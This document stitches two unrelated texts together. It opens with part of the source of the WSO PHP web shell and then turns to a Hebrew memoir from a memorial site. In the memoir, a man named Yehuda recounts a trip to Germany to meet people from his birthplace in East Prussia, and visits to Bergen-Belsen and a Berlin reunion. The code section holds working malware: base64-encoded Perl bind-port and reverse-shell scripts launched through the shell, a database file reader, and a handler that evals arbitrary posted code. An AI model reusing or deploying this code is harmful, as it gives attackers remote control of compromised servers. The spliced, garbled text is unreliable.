echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
$line = 1;
while($item = $db->fetch()) {
if(!$title) {
echo '<tr>';
foreach($item as $key => $value)
echo '<th>'.$key.'</th>';
reset($item);
$title=true;
echo '</tr><tr>';
$line = 2;
}
echo '<tr class="l'.$line.'">';
$line = $line==1?2:1;
foreach($item as $key => $value) {
if($value == null)
echo '<td><i>null</i></td>';
else
echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
}
echo '</tr>';
}
echo '</table>';
} else {
echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                    echo htmlspecialchars($_POST['p2']);
                echo "</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
}
echo "</table></form><br/>";
            if($_POST['type']=='mysql') {
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                if($db->fetch())
                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
            }
if(@$_POST['p1'] == 'loadfile') {
$file = $db->loadFile($_POST['p2']);
echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
}
} else {
        echo htmlspecialchars($db->error());
    }
echo '</div>';
wsoFooter();
}
function actionNetwork() {
wsoHeader();
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
<span>Bind port to /bin/sh [perl]</span><br/>
Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form>
<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
<span>Back-connect  [perl]</span><br/>
Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form><br>";
if(isset($_POST['p1'])) {
function cf($f,$t) {
$w = @fopen($f,"w") or @function_exists('file_put_contents');
if($w){
@fwrite($w,@base64_decode($t));
@fclose($w);
}
}
if($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl",$bind_port_p);
$out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
            sleep(1);
echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
            unlink("/tmp/bp.pl");
}
if($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl",$back_connect_p);
$out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
            sleep(1);
echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
            unlink("/tmp/bc.pl");
}
}
echo '</div>';
wsoFooter();
}
function actionRC() {
if(!@$_POST['p1']) {
$a = array(
"uname" => php_uname(),
"php_version" => phpversion(),
"wso_version" => WSO_VERSION,
"safemode" => @ini_get('safe_mode')
);
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
if( empty($_POST['a']) )
if(isset($default_action) && function_exists('action' . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
call_user_func('action' . $_POST['a']);
exit;

בחזרה מהגולה  

שבע שנים עסקנו במחקר לאחר שנודע לי שאני אומצתי ע'י קרובי משפחה שנתנו לי את חיי.
שבע שנים וחמישה קלסרים עווי קרס עם מסמכים,מכתבים,תמונות,ומה לא.רק לאחרונה כל הסיפור שלי שכבר נכתב כאן קיבל תפנית של 190 מעלות,חוקר משפחות שגר בדורטמונט בא לעזרתי,
הוא יליד אותה עיירה ופתח לפני עולם שלא הכרתי.הוא הפגיש ביני לבין אישה שהוריה היו שכנים להורי ואותי הכירה מלידה.לפני חודשיים צלצל אלי חוקר המשפחות ונקרא בשמו אלפרד והזמין
אותי לבא לגרמניה לברלין למפגש של כל אלה שנשארו בחיים וגרו בפרוסיה המזרחית.(ופה אני
חייב לציין שלא רק היהודים נרדפו אלא גם קתולים ונוצרים ותיכף אני אפרט.)כמובן שתשובתי היית מיד שלילית והוא ענה לי שכך הוא חשב.אך אז באה תפנית שזה היה הקש ששבר את גבי.ואז באה ההודעה ממנו אל אותה קריסטה שהוריה גרו לידינו,היא הכירה אותי מלידה.
ולומר את האמת כל הלילה ההוא לא עצמתי עיין היו לי לבטים קשים ביותר עם לנסוע או לא.
אך פה היית נקודת שבירה והחלטתי לנסוע,בכל אותה העת שיתפתי את אשתי וילדי הם עודדו
אותי ונתנו לי את ברכת הדרך,ושניים מהם אף ליוו אותנו לשדה התעופה פן אתחרט ברגע
האחרון ואחזור הביתה.שכנתי שגרה מולי אף באה לקראתי היא פקחית טיסה והיא לוותה אותנו עד ליציאה לכיוון המטוס היא נגשה לאחראית אחת המחלקות ושדרגה לנו את הכרטיסים למחלקת עסקים ללא תמורה ולאחר שדלתות המטוס נסגרו קיבלתי בפעם הראשונה פרפרים בבטן.
נחתנו בפרנקפורט,שם שהינו יומיים,ומשם אספו אותנו חברים לדמשטט.אצלם היינו יומיים
והמשכנו לקולון.גם שם היינו יומיים ביקרנו בעיר והמשכנו למיין,גם שם היינו יומיים,ומשם
נסענו לדורמונט נסיעה של 3 שעות. כל מילה שלישית שלי היית בעברית כמובן יימח שמם בדורמונט היינו 6 ימים התארחנו אצל אלפרד אנשים נפלאים סיירנו בעיר ולמחרת החלו פגישות ,ביקרנו בבית הכנסת של הקהילה שמונה כ 400 איש רובם יוצאי ברית-המועצות
שוחחנו אם רבים מהם שיודעים את השפה העברית,אך שמתי גם לב שבזמן שיש פעילות בבית-הכנסת נידת של המשטרה עומדת דרך קבע בחוץ.מדורטמונט נסענו לברלין מרחק קטן רק
700 ק'מ אך מה נעימה היית הנסיעה במרצדס חדישה,מזג האוויר היה 22 מעלות לפי הזמנה
בדרך לברלין עצרנו במחנה ההשמדה ברגן בלזן שממנו לא נשאר זכר אך שם נבנה מוזיאון לתפארת,
לאחר עשר דקות שהייתי בפנים בקשתי ממארחי סליחה ויצאתי החוצה לא הייתי מסוגל
יותר לראות את התמונות.משם נסענו אל אותה קריסטה ,פה היית לי שבירה קטנה,לפני שדפקתי
בדלת עמדתי אם עצמי וניסיתי להיות חזק אך כנראה שלרגשות אין גבולות ואז כשהדלת
נפתחה התחבקנו ולקח לשנינו זמן מה להתאושש.כמובן שכל הסיפור שלה תועד ברשם קול
ועל גבי מסרטה,בין היתר היא ידעה לספר לי שגם הנוצרים והקטולים ברחו מהנאצים ובתחנת הרכבת כאשר הם הגיעו הרוסים והגרמנים ירו בהם ואחותה נפצעה .היינו שם יום אחד ומשם דרך קובלנץ,בון,ועוד שתי ערים שאנני זוכר את שמן הגענו לברלין,בברלין היינו יומיים עשינו סיור מורחב בעיר באוטובוס תירים קומותיים בלי גג סיירנו
גם בברלין המזרחית ועדיין ניתן לראות את ההבדלים בין שתי הערים,עברנו בצ'ק פוסט צ'רלי
שם עדיין עומדים חילים אמרקאים אך זה רק כדי לא לשכוח את העבר ביקרנו בבית העירייה
במשכן הנשיא,והמשכנו לברלין הלה זה האולם הענקי שבו הטלר יימח שמו הכריז בשנת 44
על הפתרון הסופי. היו שם אני מאריך כ 2000 איש שבאו מכל העולם,באולם היו מסודרים שולחנות וספסלים ומעל כל 3 שולחנות היה שלט העיר.כך שיצא לי לשבת אם אנשים שמעבר למסך הברזל ובכל שולחן היה ספר אורחים שבכמה מהם אשתי רשמה את כתובתינו במידה וימצא
משהוא שיכול לתת מידע שהוא.גם נפגשתי אם אישה אחת שגרה בעיר הולדתי שסיפרה לי
שהיא מכירה שתי נשים שנולדו בעיר ועדיין חיות היא תהיה עימי בקשר עם יהיו לה ידיעות שהן,
למחרת היה לנו יום חופשי בחרנו להישאר במלון לנוח,ובלילה חזרנו הביתה. בסך הכל זו היית נסיעה מאד ענינית פורייה אך גם עצובה,שמחתי לחזור שוב הביתה לישון שוב במיטתי. יהודה


בחזרה מהגולה  
http://asafsolomon.com/he/node/265
ספורי מהחיים  
http://www.google.co.il/search?q=%22%D7%99%D7%94%D7%95%D7%93%D7%94+%D7%90%D7%9C%D7%9B%D7%A1%D7%A0%D7%93%D7%A8%22&rls=com.microsoft:he:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7RNTM_iw&redir_esc=&ei=0LitS7iMNdHR4gb82JDtDw
My Story  
http://www.missing-identity.net/mi/index.php?option=com_content&task=view&id=53&Itemid=26
 
לקריאת דברים נוספים מפרי עטו לחץ כאן 
שם פרטי:
שם משפחה:
חיפוש מתקדם
דף הבית |  יצירת אתר זיכרון |  מידע לאבלים ולמנחמים |  אודות "עד עולם" |  תקנון |  צור קשר |  כל אתרי ההנצחה
כל הזכויות שמורות ©